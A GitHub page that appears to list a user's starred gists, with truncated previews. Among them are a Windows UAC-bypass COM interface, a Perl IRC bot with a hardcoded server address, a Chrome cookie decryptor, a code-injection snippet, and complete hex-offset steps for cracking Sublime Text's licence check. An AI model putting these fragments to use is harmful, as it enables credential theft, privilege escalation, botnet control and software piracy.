Skip to content

Instantly share code, notes, and snippets.

View kcufId's full-sized avatar

kcufId

19 followers · 61 following
View GitHub Profile
@smx-smx
smx-smx / XZ Backdoor Analysis
Last active February 24, 2026 09:30
[WIP] XZ Backdoor Analysis and symbol mapping
XZ Backdoor symbol deobfuscation. Updated as i make progress
@puppis42
puppis42 / ProtectProcess.cpp
Created May 28, 2023 13:39
#include <Windows.h>
#include "aclapi.h"
#include <chrono>
#include <thread>
DWORD ProtectProcess(void)
{
HANDLE hProcess = GetCurrentProcess();
PACL pEmptyDacl;
DWORD dwErr;
@zackmark29
zackmark29 / decryptchromecookies.py
Created May 16, 2021 14:19
Decrypt Chrome Cookies File (Python 3) - Windows
# Based on:
# https://gist.github.com/DakuTree/98c8362fb424351b803e
# https://gist.github.com/jordan-wright/5770442
# https://gist.github.com/DakuTree/428e5b737306937628f2944fbfdc4ffc
# https://stackoverflow.com/questions/60416350/chrome-80-how-to-decode-cookies
# https://stackoverflow.com/questions/43987779/python-module-crypto-cipher-aes-has-no-attribute-mode-ccm-even-though-pycry
import os
import json
import base64
@KasparNagu
KasparNagu / advancedInstallerExtractor.py
Last active February 12, 2026 11:54
Script to extract Advanced Installer Exes
#!/usr/bin/env python
import sys
import struct
import os
#inspired by https://aluigi.altervista.org/bms/advanced_installer.bms
#with some additionaly reverse engeneering, quite heursitic (footer search, xor guessing etc)
#licence: public domain
@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active March 12, 2026 11:10
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)
@sv0
sv0 / as.pl
Created January 24, 2019 14:41 — forked from nl5887/as.pl
Perl IRC bot
#!/usr/bin/perl
my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.112");
$servidor= $server[rand scalar @server] unless $servidor;
@herrcore
herrcore / ida_memdump.py
Created November 13, 2017 03:38
Dump a blob of memory into a file - IDA Pro script
import idautils
import idaapi
def memdump(ea, size, file):
data = idc.GetManyBytes(ea, size)
with open(file, "wb") as fp:
fp.write(data)
print "Memdump Success!"
@simoncos
simoncos / golang_on_rpi.md
Last active March 7, 2025 06:21 — forked from konradko/golang_on_rpi.md
Install Golang 1.9 on Raspberry Pi

Install Golang 1.9:

wget https://storage.googleapis.com/golang/go1.9.linux-armv6l.tar.gz
sudo tar -C /usr/local -xzf go1.9.linux-armv6l.tar.gz
export PATH=$PATH:/usr/local/go/bin # put into ~/.profile

If already installed old golang with apt-get:

@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@Nordwald
Nordwald / debug.c
Last active July 11, 2020 13:11
Code Injection
/*
* Gets Thread token for current thread.
* Returns NULL on failure.
*/
HANDLE GetCurrentThreadToken()
{
HANDLE hToken;
if (!OpenThreadToken(